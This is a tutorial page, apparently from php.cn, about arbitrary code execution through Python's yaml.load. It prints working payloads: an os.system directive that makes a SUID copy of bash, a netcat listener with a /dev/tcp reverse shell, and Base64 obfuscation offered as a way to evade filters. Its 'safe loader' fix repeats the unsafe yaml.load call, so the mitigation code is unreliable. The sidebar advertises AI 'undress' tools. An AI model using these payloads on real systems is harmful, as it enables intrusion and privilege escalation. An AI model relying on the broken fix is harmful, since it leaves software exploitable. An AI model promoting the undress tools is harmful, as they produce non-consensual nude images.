Be Careful When Using YAML in Python! There May Be Security Vulnerabilities-Python Tutorial-php.cn

Home

Backend Development

Python Tutorial

Be Careful When Using YAML in Python! There May Be Security Vulnerabilities

Patricia Arquette

Jan 03, 2025 pm 10:15 PM

Be Careful When Using YAML in Python! There May Be Security Vulnerabilities

The YAML (YAML Ain't Markup Language) library in Python has been identified as having vulnerabilities that allow the execution of arbitrary commands under certain conditions. The vulnerability arises from the use of the yaml.load function without specifying a safe loader. By default, yaml.load can execute arbitrary Python objects, which creates an attack surface for malicious payloads.

Exploitation via Arbitrary Command Execution

The fundamental risk lies in the deserialization process. When a YAML document contains a malicious payload, yaml.load processes the embedded directives, potentially leading to code execution. For example, consider the following snippet:

import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage

Here, the yaml.load function parses example.yml without restrictions, making it vulnerable if the YAML content includes unsafe directives. A typical exploit payload can be crafted to execute arbitrary system commands.

Example Payload

import yaml
from yaml import Loader, UnsafeLoader

# Malicious payload
payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'

# Exploitation
yaml.load(payload)
yaml.load(payload, Loader=Loader)
yaml.load(payload, Loader=UnsafeLoader)

Each of these invocations processes the payload, resulting in the creation of a privileged executable in /tmp/bash. This binary can then be executed with elevated privileges:

/tmp/bash -p

This demonstrates the potential for privilege escalation if the vulnerability is exploited on a system with misconfigured permissions or other weaknesses.

Reverse Shell Exploitation

A particularly insidious use case is leveraging the vulnerability for a reverse shell. This allows attackers to gain remote access to the target machine. The process involves starting a listener on the attacker's machine and crafting a YAML document designed to establish the reverse connection.

On the attacker's machine, initiate a Netcat listener:

nc -lvnp 1234

On the target system, execute the following Python script as root:

import yaml

# Reverse shell payload
data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]'
yaml.load(data)  # Executes the reverse shell

This payload instructs the target machine to connect back to the attacker's listener, providing a fully interactive shell with the privileges of the executing process.

Base64 Encoding for Obfuscation

To bypass basic security controls or filters, the payload can be Base64-encoded. This method adds a layer of obfuscation, potentially evading detection by static analysis tools.

Example

from base64 import b64decode
import yaml

# Base64-encoded payload
encoded_payload = b"ISFweXRa...YXNoIl0="  # Truncated for brevity
payload = b64decode(encoded_payload)

# Execute the payload
yaml.load(payload)

Mitigation Techniques

Professionals must adopt strict coding practices to eliminate such vulnerabilities. Recommended mitigations include:

Using Safe Loaders: Replace yaml.load with yaml.safe_load, which prevents the execution of arbitrary objects.
```
import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage
```
Restricting Input Sources: Ensure YAML inputs are sanitized and originate only from trusted sources.
Applying Static Analysis: Use tools to scan codebases for unsafe yaml.load invocations.
Environment Hardening: Restrict system permissions to minimize the impact of exploitation. For example, using containerized environments limits an attacker's ability to escalate privileges.

The YAML library’s default behavior exemplifies the risks associated with deserialization in dynamically typed languages like Python. Exploiting this vulnerability requires minimal sophistication, making it a high-priority issue for secure application development. Adopting safe coding practices, along with robust input validation and runtime safeguards, is imperative to mitigate these risks effectively.

The above is the detailed content of Be Careful When Using YAML in Python! There May Be Security Vulnerabilities. For more information, please follow other related articles on the PHP Chinese website!

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Merging Lists in Python: Choosing the Right MethodMay 14, 2025 am 12:11 AM

TomergelistsinPython,youcanusethe operator,extendmethod,listcomprehension,oritertools.chain,eachwithspecificadvantages:1)The operatorissimplebutlessefficientforlargelists;2)extendismemory-efficientbutmodifiestheoriginallist;3)listcomprehensionoffersf

How to concatenate two lists in python 3?May 14, 2025 am 12:09 AM

In Python 3, two lists can be connected through a variety of methods: 1) Use operator, which is suitable for small lists, but is inefficient for large lists; 2) Use extend method, which is suitable for large lists, with high memory efficiency, but will modify the original list; 3) Use * operator, which is suitable for merging multiple lists, without modifying the original list; 4) Use itertools.chain, which is suitable for large data sets, with high memory efficiency.

Python concatenate list stringsMay 14, 2025 am 12:08 AM

Using the join() method is the most efficient way to connect strings from lists in Python. 1) Use the join() method to be efficient and easy to read. 2) The cycle uses operators inefficiently for large lists. 3) The combination of list comprehension and join() is suitable for scenarios that require conversion. 4) The reduce() method is suitable for other types of reductions, but is inefficient for string concatenation. The complete sentence ends.

Python execution, what is that?May 14, 2025 am 12:06 AM

PythonexecutionistheprocessoftransformingPythoncodeintoexecutableinstructions.1)Theinterpreterreadsthecode,convertingitintobytecode,whichthePythonVirtualMachine(PVM)executes.2)TheGlobalInterpreterLock(GIL)managesthreadexecution,potentiallylimitingmul

Python: what are the key featuresMay 14, 2025 am 12:02 AM

Key features of Python include: 1. The syntax is concise and easy to understand, suitable for beginners; 2. Dynamic type system, improving development speed; 3. Rich standard library, supporting multiple tasks; 4. Strong community and ecosystem, providing extensive support; 5. Interpretation, suitable for scripting and rapid prototyping; 6. Multi-paradigm support, suitable for various programming styles.

Python: compiler or Interpreter?May 13, 2025 am 12:10 AM

Python is an interpreted language, but it also includes the compilation process. 1) Python code is first compiled into bytecode. 2) Bytecode is interpreted and executed by Python virtual machine. 3) This hybrid mechanism makes Python both flexible and efficient, but not as fast as a fully compiled language.

Python For Loop vs While Loop: When to Use Which?May 13, 2025 am 12:07 AM

Useaforloopwheniteratingoverasequenceorforaspecificnumberoftimes;useawhileloopwhencontinuinguntilaconditionismet.Forloopsareidealforknownsequences,whilewhileloopssuitsituationswithundeterminediterations.

Python loops: The most common errorsMay 13, 2025 am 12:07 AM

Pythonloopscanleadtoerrorslikeinfiniteloops,modifyinglistsduringiteration,off-by-oneerrors,zero-indexingissues,andnestedloopinefficiencies.Toavoidthese:1)Use'i

See all articles

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to fix KB5055612 fails to install in Windows 10?

4 weeks agoByDDD

Roblox: Grow A Garden - Complete Mutation Guide

3 weeks agoByDDD

Roblox: Bubble Gum Simulator Infinity - How To Get And Use Royal Keys

3 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Mandragora: Whispers Of The Witch Tree - How To Unlock The Grappling Hook

3 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Nordhold: Fusion System, Explained

3 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

SublimeText3 English version

Recommended: Win version, supports code prompts!

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software